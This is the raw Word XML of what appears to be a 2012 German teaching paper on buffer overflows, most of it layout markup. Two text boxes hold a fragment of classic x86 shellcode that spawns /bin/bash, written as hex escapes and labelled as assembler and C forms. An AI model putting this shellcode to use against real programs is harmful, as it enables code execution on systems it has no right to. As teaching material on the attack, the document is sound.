                      <w:proofErr w:type="spellEnd"/>
                      <w:r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>Als Assembler Code</w:t>
      </w:r>
    </w:p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0EBD23F" wp14:editId="61ED9027">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>254167</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4686300" cy="2743668"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="14" name="Textfeld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274366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eb</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>\x18\x5e\x31\xc0\x88\x46\x09\x89\x76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9\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e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d\x56\x0e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\xe8\xe3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2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42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42\x43\x43\x43\x43"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ret+2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4" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:17.75pt;margin-top:20pt;width:369pt;height:216.0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eb</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>\x18\x5e\x31\xc0\x88\x46\x09\x89\x76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9\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e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d\x56\x0e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\xe8\xe3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2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42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42\x43\x43\x43\x43"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ret+2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 xml:space="preserve">Als C Code </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsid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Default="00660EE9" w:rsidP="00660EE9"/>
    <w:p w:rsidR="00660EE9" w:rsidRPr="00660EE9" w:rsidRDefault="00660EE9" w:rsidP="00660EE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8165"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00660EE9" w:rsidRPr="00660EE9" w:rsidSect="00660EE9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3419" w:rsidRDefault="00C73419" w:rsidP="00FC49EC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C73419" w:rsidRDefault="00C73419" w:rsidP="00FC4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3419" w:rsidRDefault="00C73419" w:rsidP="00FC49EC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C73419" w:rsidRDefault="00C73419" w:rsidP="00FC49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9EC" w:rsidRDefault="00FC49EC">
    <w:pPr>
      <w:pStyle w:val="Kopfzeile"/>
    </w:pPr>
    <w:r>
      <w:t>Jan Kevin Dick</w:t>
    </w:r>
    <w:r>
      <w:ptab w:relativeTo="margin" w:alignment="center" w:leader="none"/>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:t>Buffer</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:t xml:space="preserve"> Overflow</w:t>
    </w:r>
    <w:r>
      <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="none"/>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> TIME \@ "dd.MM.yyyy" </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00FB1D24">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>15.10.201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0F192C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F08FDD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5F6FA2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D21065D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1B3758A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2512A3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D36AF2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="402AFE5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46A0DD3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9496EA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456576A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77AEE18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1B2"/>
    <w:rsid w:val="00031A40"/>
    <w:rsid w:val="0029267D"/>
    <w:rsid w:val="004C01B2"/>
    <w:rsid w:val="00536AB5"/>
    <w:rsid w:val="00660EE9"/>
    <w:rsid w:val="008B1A26"/>
    <w:rsid w:val="00985FDC"/>
    <w:rsid w:val="00A52A11"/>
    <w:rsid w:val="00B47EE5"/>
    <w:rsid w:val="00C73419"/>
    <w:rsid w:val="00E07EC2"/>
    <w:rsid w:val="00FB1D24"/>
    <w:rsid w:val="00FC4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FF6ECC-C66B-4ABB-A641-2E1E9082D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62</Words>
  <Characters>2285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 Kevin Dick</dc:creator>
  <cp:lastModifiedBy>Jan Kevin Dick</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <cp:lastPrinted>2012-10-15T09:19:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-10-15T06:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-10-15T09:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>